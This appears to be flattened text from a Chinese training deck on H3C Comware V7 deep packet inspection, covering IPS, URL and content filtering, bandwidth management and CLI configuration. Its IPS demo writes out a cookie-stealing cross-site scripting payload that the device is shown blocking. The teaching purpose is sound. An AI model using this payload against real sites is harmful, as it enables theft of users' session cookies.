深度报文检测技术Comware V7 DPI

深度报文检测技术ComwareV7DPI了解DPI特性基本原理掌握DPI特性配置方法熟悉DPI特性应用场景了解DPI特性基本维护学习完本课程，您应该能够：21.DPI基本工作原理2.DPI功能及相应配置方法3.DPI典型组网应用4.DPI基本维护目录3DPI深度安全的需求背景DPI（DeepPacketInspection，深度报文检测）深度安全是一种基于应用层信息对流经设备的网络流量进行检测和控制的安全机制业务识别：指对报文传输层以上的内容进行分析，由应用层检测引擎模块来完成，是实现DPI深度安全功能的核心和基础。业务识别的结果为DPI各业务模块对报文的处理提供判断依据业务控制：系统根据各DPI业务模块策略及规则配置，实现对业务流量的灵活控制，包括：放行、丢弃、源阻断、重置、捕获和生成日志业务统计：指对业务流量的类型、协议解析结果、特征报文检测和处理结果等进行统计。统计结果可直观体现业务流量分布和使用情况，为网络可视化运维和业务持续优化提供依据4DPI基本工作原理5预定义特征库自定义特征配置规则V7域间策略原始数据流纯净数据流特征下发规则下发IPS特征库APR特征库URL分类特征库自定义IPS规则自定义URL规则DPI简易报文处理流程6DPI与V7域间策略的关系71.DPI基本工作原理2.DPI功能及相应配置方法3.DPI典型组网应用4.DPI基本维护8目录DPI为ComwareV7提供的特性APR 应用识别IPS 入侵防御UFLT URL过滤DFLT 内容过滤AVC 带宽管理AV 病毒防护9应用识别APR基于端口的应用层协议识别PBAR通用端口映射主机端口映射基于内容特征的应用层协议识别NBAR预定义特征库自定义特征（TCP、UDP、HTTP）基于流特征的应用识别10APR特征库支持1000多种主流应用特征支持在线服务器升级及周期自动升级支持本地离线升级支持特征库回滚与恢复出厂状态升级特征库需License授权11应用12IPS入侵防御系统深度防护：可以检测报文应用层内容，以及对网络数据流进行协议分析和重组，并根据检测结果来对报文做出相应的处理实时防护：实时检测流经设备的网络流量，并对入侵活动和攻击网络流量进行实时拦截全方位防护：可以对多种攻击类型提供防护措施，例如蠕虫、病毒、木马、僵尸网络、间谍软件、广告软件、跨站脚本攻击、注入攻击、目录遍历、信息泄露、远程文件保护攻击、溢出攻击、代码执行、拒绝服务、扫描攻击、后门等等内外兼防：对经过设备的流量都可以进行检测，不仅可以防止来自企业外部的攻击，还可以防止发自企业内部的攻击13IPS特征库预定义特征支持2w+的特征周期发布、自动周期在线更新手工立即在线更新或离线更新特征库回滚或恢复出厂设置升级需License授权自定义特征需遵循Snort语法仅支持以文件导入方式形成自定义IPS特征14IPS动作IPS动作指设备对匹配IPS特征的报文可执行的操作，IPS处理动作包括如下几种类型重置：通过发送TCP的reset报文或UDP的ICMP端口不可达报文断开TCP或UDP连接源阻断：阻断符合特征的报文。如果设备上同时开启了黑名单过滤功能，则将该报文的源IP地址加入黑名单，再次收到来自此IP地址的报文时直接丢弃丢弃：丢弃符合特征的报文放行：允许符合特征的报文通过捕获：捕获符合特征的报文生成日志：对符合特征的报文生成日志信息15IPS策略策略整体流程如果报文与黑名单匹配成功，则直接丢弃该报文如果报文匹配了某对象策略规则，且此对象策略规则的动作是inspect，则设备将对报文进行深度内容检测：首先，识别报文的协议，然后根据协议分析方案进行更精细的分析，并深入提取报文特征设备将提取的报文特征与IPS特征进行匹配，并对匹配成功的报文进行如下处理如果报文同时与多个IPS特征匹配成功，则根据这些动作中优先级最高的动作进行处理。动作优先级从高到低的顺序为：reset->(block-source/drop)->permit，其中block-source与drop的优先级相同如果报文只与一个IPS特征匹配成功，则根据此特征中指定的动作进行处理如果报文未与任何IPS特征匹配成功，则设备直接允许报文通过16IPS策略典型组网如图所示，Device分别通过Trust安全域和Untrust安全域与局域网和Internet相连。现要求使用设备上的缺省IPS策略对常见的网络攻击进行防御17IPS策略典型配置配置各接口的IP地址（略）配置IPS功能创建名为sec的DPI应用profile，并进入该DPI应用profile视图[Device]app-profilesec在DPI应用profilesec中应用缺省IPS策略default，并指定该IPS策略的模式为Protect[Device-app-profile-sec]ipsapplypolicydefaultmodeprotect配置对象策略配置安全域向安全域Trust中添加接口GigabitEthernet1/0/1[Device]security-zonenametrust[Device-security-zone-Trust]importinterfacegigabitethernet1/0/1向安全域Untrust中添加接口GigabitEthernet1/0/2[Device]security-zonenameuntrust[Device-security-zone-Untrust]importinterfacegigabitethernet1/0/218IPS策略典型配置（续）配置对象创建名为ipsfilter的IP地址对象组，并定义其子网地址为/24[Device]object-groupipaddressipsfilter[Device-obj-grp-ip-ipsfilter]networksubnet24配置对象策略及规则创建名为ipsfilter的IPv4对象策略，并进入该对象策略视图[Device]object-policyipipsfilter对源IP地址对象组ipsfilter对应的报文进行深度检测，引用的DPI应用profile为sec。[Device-object-policy-ip-ipsfilter]ruleinspectsecsource-ipipsfilterdestination-ipany配置安全域间实例并应用对象策略创建源安全域Trust到目的安全域Untrust的安全域间实例，并应用对源IP地址对象组ipsfilter对应的报文进行深度检测的对象策略ipsfilter[Device]zone-pairsecuritysourcetrustdestinationuntrust[Device-zone-pair-security-Trust-Untrust]object-policyapplyipipsfilter19IPS策略举例20攻击者HTTP服务器PC构造CSS攻击，访问http服务器，通过浏览器访问8:8080/?detail=<script>document.location.replace('0'+document.cookie);</script>检测到攻击阻断并记录日志威胁日志列表21威胁报表22UFLTURL过滤原理URL过滤功能是指对用户访问的URL进行控制，即允许或禁止用户访问的Web资源，达到规范用户上网行为的目的目前仅支持基于HTTP协议的URL过滤通过使用URL过滤规则匹配URL中的host字段和URI字段23URL过滤规则URL过滤规则是指对用户HTTP报文中的URL进行匹配的原则，且其分为两种规则预定义规则：根据设备中的URL过滤特征库自动生成，包括百万级的HOST或URI。预定义规则能满足多数情况下的URL过滤需求自定义规则：由管理员手动配置生成，可以通过使用正则表达式或者文本的方式来配置规则中HOST或URI的内容URL过滤规则支持两种匹配方式文本匹配：使用指定的字符串对HOST和URI字段进行精确匹配正则表达式匹配：使用正则表达式对HOST和URI字段进行模糊匹配。例如，规则中配置HOST的正则表达式为sina.*cn，则HOST为的URL会匹配成功24URL分类与URL策略为便于管理员对数目众多的URL过滤规则进行统一部署，URL过滤模块提供了URL过滤分类功能，以便对具有相似特征的URL过滤规则进行归纳以及为匹配这些规则的URL统一指定处理动作每个URL过滤分类具有一个严重级别属性，即此过滤分类的处理优先级预定义分类：根据设备中的URL过滤特征库自动生成，仅可以修改其严重级别自定义分类：由管理员手动配置，可修改其严重级别，可添加URL过滤规则URL过滤策略是用于关联所有URL过滤配置的一个实体策略中可以配置URL过滤分类和处理动作的绑定关系策略中可以配置缺省动作（即对未匹配上任何URL过滤规则的报文采取的动作）支持的处理动作包括，丢弃、放行、阻断、重置和生成日志25URL过滤策略策略整体流程如果报文匹配了某对象策略规则，且此对象策略规则的动作是inspect，则设备提取报文中的URL字段进行过滤规则匹配报文成功匹配URL过滤规则后，设备将进一步判断该规则是否同时属于多个URL过滤分类如果此URL过滤规则同时属于多个URL过滤分类，则根据严重级别最高的URL过滤分类的动作对此报文进行处理如果此URL过滤规则只属于一个URL过滤分类，则根据该规则所属的URL过滤分类的动作对此报文进行处理如果报文未匹配上任何一条URL过滤规则。设备将进一步判断URL过滤策略中是否存在URL过滤缺省动作，并根据缺省动作对此报文进行处理否则直接允许报文通过26URL过滤策略典型组网如图所示，Device分别通过Trust安全域和Untrust安全域与局域网和Internet相连。现有组网需求如下允许Trust安全域的主机访问Untrust安全域的WebServer上的配置预定义URL过滤分类Pre-Games的动作为丢弃并生成日志配置URL过滤策略缺省动作为丢弃和生成日志27URL过滤策略典型配置配置各接口的IP地址（略）配置URL过滤功能创建名news的URL过滤分类并进入相应视图，设置该分类的级别值为2000[Device]url-filtercategorynewsseverity2000在URL过滤分类news中添加一条规则，使用字符串对host字段进行精确匹配[Device-url-filter-category-news]rule1hosttext创建名为urlnews的URL过滤策略，并进入该URL过滤策略视图[Device]url-filterpolicyurlnews在URL过滤策略urlnews中，配置URL过滤分类news绑定的动作为允许[Device-url-filter-policy-urlnews]categorynewsactionpermit在URL过滤策略urlnews中，配置预定义URL过滤分类Pre-Games绑定的动作为丢弃并生成日志[Device-url-filter-policy-urlnews]categoryPre-Gamesactiondroplogging28URL过滤策略典型配置（续）在URL过滤策略urlnews中，配置策略的缺省动作为丢弃和告警[Device-url-filter-policy-urlnews]default-actionactiondroplogging创建名为sec的DPI应用profile，并进入该DPI应用profile视图[Device]app-profilesec在DPI应用profilesec中应用URL过滤策略urlnews[Device-app-profile-sec]url-filterapplyurlnews执行inspectactivate命令使得以上与URL过滤策略相关的配置生效[Device]inspectactivate配置安全域向安全域Trust中添加接口GigabitEthernet1/0/1[Device]security-zonenametrust[Device-security-zone-Trust]importinterfacegigabitethernet1/0/1向安全域Untrust中添加接口GigabitEthernet1/0/2[Device]security-zonenameuntrust[Device-security-zone-Untrust]importinterfacegigabitethernet1/0/229URL过滤策略典型配置（续）配置对象创建名为urlfilter的IP地址对象组，并定义其子网地址为/24[Device]object-groupipaddressurlfilter[Device-obj-grp-ip-urlfilter]networksubnet24配置对象策略及规则创建名为urlfilter的IPv4对象策略，并进入该对象策略视图[Device]object-policyipurlfilter对源IP地址对象组urlfilter对应的报文进行深度检测，引用的DPI应用profile为sec[Device-object-policy-ip-urlfilter]ruleinspectsecsource-ipurlfilterdestination-ipany配置安全域间实例并应用对象策略创建源安全域Trust到目的安全域Untrust的安全域间实例，并应用对源IP地址对象组urlfilter对应的报文进行深度检测的对象策略urlfilter[Device]zone-pairsecuritysourcetrustdestinationuntrust[Device-zone-pair-security-Trust-Untrust]object-policyapplyipurlfilter30URL过滤策略举例31攻击PCPC访问符合安全策略的网站检测到非合规访问阻断并记录日志URL日志列表32URL报表33DFLT内容过滤内容过滤是一种对通过设备的应用层协议报文内容进行过滤的安全机制采用内容过滤功能可以阻止内部网络用户访问非法网站，并阻止含有非法内容的报文进入内部网络目前该功能仅支持HTTP协议34HTTP协议内容过滤功能原理Method过滤设备收到HTTP请求报文后，对其中的请求Method字段进行过滤，阻止用户某些请求行为URI（UniformResourceIdentifier，统一资源标识符）过滤设备收到HTTP请求报文后，对请求URI中的内容进行过滤，阻止用户访问某些特定的网站或阻止URI中非法内容；同时支持对URI字段的长度进行过滤Header过滤服务器发往客户端的HTTP响应报文中的Header字段一般包含当前网页的类型（如文本、图片等）、HTTP内容长度、服务器基本信息（如服务器类型、响应时间等）等信息，使用Header过滤可以阻止Header字段中含有特定信息的HTTP响应报文通过设备；同时，也支持对HTTP请求报文中Header字段进行过滤Body过滤使用Body过滤可以对服务器发往客户端的HTTP报文中携带的最终可视内容（即用户在浏览器上看到的实际内容）进行过滤，阻止含有特定可视内容的报文通过设备，以防止非法内容在内部网络中传播；同时，也支持对HTTP请求报文的Body字段进行过滤状态行过滤使用状态行过滤可以阻止状态行字段中含有特定信息的HTTP响应报文通过设备35内容过滤策略典型组网如图所示，Device分别通过Trust安全域和Untrust安全域与局域网和Internet相连。现有以下组网需求阻止子头域中含有“abc”关键字的HTTP请求报文通过阻止Method字段含有GET关键字的HTTP请求报文通过阻止URI字段含有“uri”关键字的HTTP请求报文通过阻止Body字段含有“abc.*abc”关键字的HTTP响应报文通过对以上被阻止的报文生成日志信息36内容过滤策略典型配置配置各接口的IP地址（略）配置正则表达式集创建正则表达式集regex0，并进入正则表达式集视图[Device]content-filteringregexregex0配置匹配关键字abc。[Device-cflt-regex-regex0]patterntextabc创建正则表达式集regex1，并进入正则表达式集视图[Device]content-filteringregexregex1配置匹配关键字uri。[Device-cflt-regex-regex1]patterntexturi创建正则表达式集regex2，并进入正则表达式集视图[Device]content-filteringregexregex2配置正则表达式abc.*abc[Device-cflt-regex-regex2]patternregexabc.*abc37内容过滤策略典型配置（续）配置内容过滤规则类创建HTTP协议类型的内容过滤规则类class1，并进入过滤规则类视图[Device]content-filteringclassclass1httpmatch-any配置规则1，指定HTTP请求报文的Method字段包含GET[Device-cflt-class-class1]match1requestmethodget配置规则2，指定匹配HTTP请求报文头中所有子头域正则表达式集为regex0[Device-cflt-class-class1]match2requestheaderregexregex1配置规则3，指定匹配HTTP请求报文中URI内容的正则表达式集为regex1[Device-cflt-class-class1]match3requesturiregexregex1配置规则4，指定匹配HTTP响应报文中Body字段的正则表达式集为regex2[Device-cflt-class-class1]match4responsebodyregexregex238内容过滤策略典型配置（续）配置内容过滤策略创建内容过滤策略policy1，匹配模式为match-all，并进入内容过滤策略视图[Device]content-filteringpolicypolicy1match-all配置内容过滤规则类class1和动作reset、logging的绑定关系[Device-cflt-policy-policy1]classclass1actionresetlogging配置DPI应用profile创建名称为profile1的DPI应用profile，并进入DPI应用profile视图[Device]app-profileprofile1在DPI应用profile中引用内容过滤策略policy1[Device-app-profile-profile1]content-filteringapplypolicypolicy1执行inspectactivate命令使得以上与内容过滤策略相关的配置生效[Device]inspectactivate39内容过滤策略典型配置（续）配置安全域向安全域Trust中添加接口GigabitEthernet1/0/2[Device]security-zonenametrust[Device-security-zone-Trust]importinterfacegigabitethernet1/0/2向安全域Untrust中添加接口GigabitEthernet1/0/1[Device]security-zonenameuntrust[Device-security-zone-Untrust]importinterfacegigabitethernet1/0/1配置对象策略创建名为inspect1的对象策略。[Device]object-policyipinspect1配置对象策略规则0引用DPI应用profileprofile1[Device-object-policy-ip-inspect1]rule0inspectprofile1配置安全域间实例创建源域Trust到目的域Untrust的安全域间实例，并应用对象策略inspect1[Device]zone-pairsecuritysourcetrustdestinationuntrust[Device-zone-pair-security-Trust-Untrust]object-policyapplyipinspect140AVC带宽管理带宽管理是指对通过设备的流量实现基于源/目的安全域、源/目的IP地址、用户、应用等，进行精细化的管理和控制理带宽管理的典型应用场景如下企业内网用户所需的带宽远大于从运营商租用的出口带宽，这时网络出口就会存在带宽瓶颈的问题网络出口中P2P业务类型的数据流量消耗了绝大部分的带宽资源，致使企业的关键业务得不到带宽保证为了解决以上问题，可以在网络出口设备上部署带宽管理，针对不同的内网业务流量应用不同的带宽策略规则，实现合理分配出口带宽和保证关键业务正常运行的目的41带宽管理功能原理流量匹配上带宽策略中的某条规则后，设备将根据此规则中指定的动作来对该流量进行控制。如果动作是限流（qosprofileprofile-name），则流量继续进入相应的带宽通道进行后续的处理；如果动作是拒绝（deny），则拒绝此流量通过；如果规则中没有配置动作，则直接允许该流量通过流量进入带宽通道后，设备会根据此带宽通道中的配置，对流量进行相应的处理。目前带宽通道中可配置保证最小带宽和限制最大带宽42带宽策略与规则带宽策略中可以配置多个带宽策略规则，这些规则用于定义匹配流量的匹配项以及流量控制的动作不同规则之间的匹配顺序为：按规则配置的先后顺序对流量进行匹配，一旦流量匹配某条规则便结束全部匹配过程，并根据该规则中指定的动作对此流量进行处理如果流量没有匹配任何规则，则允许该流量通过一个带宽策略规则中可以配置多种类型的匹配项匹配项包括：源/目的安全域、源/目的IP地址、用户/用户组、应用/应用组、时间段每类匹配项支持配置多个条件43带宽策略与规则（续）判断流量是否被带宽策略规则匹配的方式有两种只有规则中配置的所有匹配项均被匹配，才认为匹配成功只要规则中配置的任意一个匹配项被匹配，即认为匹配成功带宽策略规则支持嵌套关系，即一个规则中可以指定一个父规则。流量进行匹配时，遵守如下原则首先匹配父规则，若父规则匹配失败，不再进行关联子规则匹配父规则匹配成功后，再进行关联子规则匹配若子规则匹配成功，则执行子规则中指定的动作若子规则匹配失败，则仍执行父规则中指定的动作44带宽通道带宽通道定义了具体的带宽资源，是执行带宽管理的基础可将物理的带宽资源从逻辑上划分为多个虚拟的带宽通道，每个带宽通道中均可自定义相应的带宽资源限制参数目前支持的带宽资源限制参数包括以下两类保证带宽：是指保证业务的最小带宽，在线路拥堵时，可以保证公司关键业务所需的带宽，确保此类业务不受影响最大带宽：是指限制业务的最大带宽，比如限制网络中非关键业务占用的带宽资源，避免该类业务消耗大量的带宽，影响其他关键业务的正常运行45带宽管理策略典型组网主机A和主机B通过Device与外网相连，通过在Device上配置基于应用的带宽管理功能，实现当内网流量的出口发生拥塞时优先保证FTP业务的需求。具体要求如下限制内网用户，访问外网P2P应用流量的上行最大带宽和下行最大带宽均为30720kbit/s。保证内网用户，访问外网FTP应用的流量的上行保证带宽和下行保证带宽均为30720kbit/s限制外网出接口的最大带宽为30720kbit/s46带宽管理策略典型配置配置各接口的IP地址（略）配置带宽通道创建名为profileP2P的带宽通道，并进入该带宽通道视图。[Device]traffic-policy[Device-traffic-policy]profilenameprofileP2P配置上/下行最大带宽均为30720kbit/s。[Device-traffic-policy-profile-profileP2P]bandwidthupstreammaximum30720[Device-traffic-policy-profile-profileP2P]bandwidthdownstreammaximum30720创建名为profileFTP的带宽通道，并进入该带宽通道视图。[Device-traffic-policy]profilenameprofileFTP配置上/下行保证带宽均为30720kbit/s。[Device-traffic-policy-profile-profileFTP]bandwidthupstreamguaranteed30720[Device-traffic-policy-profile-profileFTP]bandwidthdownstreamguaranteed3072047带宽管理策略典型配置（续）配置出接口的期望带宽配置接口GigabitEthernet1/0/1的期望带宽为30720kbit/s[Device]interfacegigabitethernet1/0/1[Device-GigabitEthernet1/0/1]bandwidth30720[Device-GigabitEthernet1/0/1]quit配置带宽策略规则进入带宽策略视图[Device]traffic-policy创建名为ruleP2P的带宽策略规则，并进入该带宽策略规则视图[Device-traffic-policy]rulenameruleP2P在带宽策略规则ruleP2P中引用自定义的应用P2P[Device-traffic-policy-rule-ruleP2P]applicationappp2p48带宽管理策略典型配置（续）配置带宽策略规则ruleP2P中的动作为限流并应用带宽通道profileP2P[Device-traffic-policy-rule-ruleP2P]actionqosprofileprofileP2P创建名为ruleFTP的带宽策略规则，并进入该带宽策略规则视图[Device-traffic-policy]rulenameruleFTP配置带宽策略规则ruleFTP中引用预定义的应用ftp[Device-traffic-policy-rule-ruleFTP]applicationappftp配置带宽策略规则ruleFTP中的动作为限流并应用带宽通道profileFTP[Device-traffic-policy-rule-ruleFTP]actionqosprofileprofileFTP49DPI特性配置方法总则501.DPI基本工作原理2.DPI功能及相应配置方法3.DPI典型组网应用4.DPI基本维护51目录DPI典型组网在各类数据中心/园区网，为实现对内网用户上网行为进行监控审计，并对一些占用带宽比较严重的应用进行限速，可在出口处部署支持DPI特性的设备52F5020日志分析服务器某企业园区网联动认证日志收集丰富报表EIA/Radius/AAA认证服务器1.DPI基本工作原理2.DPI功能及相应配置方法3.DPI典型组网应用4.DPI基本维护53目录查看DPI检测状态54displayinspectstatus字段释义Runningstatus应用层检测引擎的运行状态，包括如下取值：bypassbyconfigure：因为配置原因引擎无法处理报文bypassbycpubusy：因为CPU使用率过高导致引擎无法处理报文bypassbymemoryshortage：因为内存不足导致引擎无法处理报文normal：引擎工作正常应用层检测引擎规则命中统计信息Slot1:RuleID ModuleRulehitsAChitsPCREtryPCREhits1 IPS 030 0 03 IPS 01 1 0268435460 UFLT 295955295955 0 0273678345 UFLT 419419 0 0268435465 UFLT 419419 0 011 IPS 09 21 015 IPS 11 1 116 IPS 02 2 055displayinspecthit-statistics字段释义RuleID检测规则IDModule检测规则所属的DPI业务的名称RuleHit检测规则被命中次数ACHitAC关键字被命中的次数PCRETry正则表达式尝试匹配的次数PCREHit正则表达式被命中的次数应用层检测引擎HTTP协议统计信息Slot1:NewCtxNewCtxErrDelCtxReqTsRspTsReqSecTsRspSecTsReqErrTsRspErrTs90 999100056displayinspecthttp字段释义NewCtx申请资源的次数，应用层检测引擎为记录HTTP报文解析结果，需要申请资源NewCtxErr申请资源失败的次数，内存不足会导致申请资源失败DelCtx应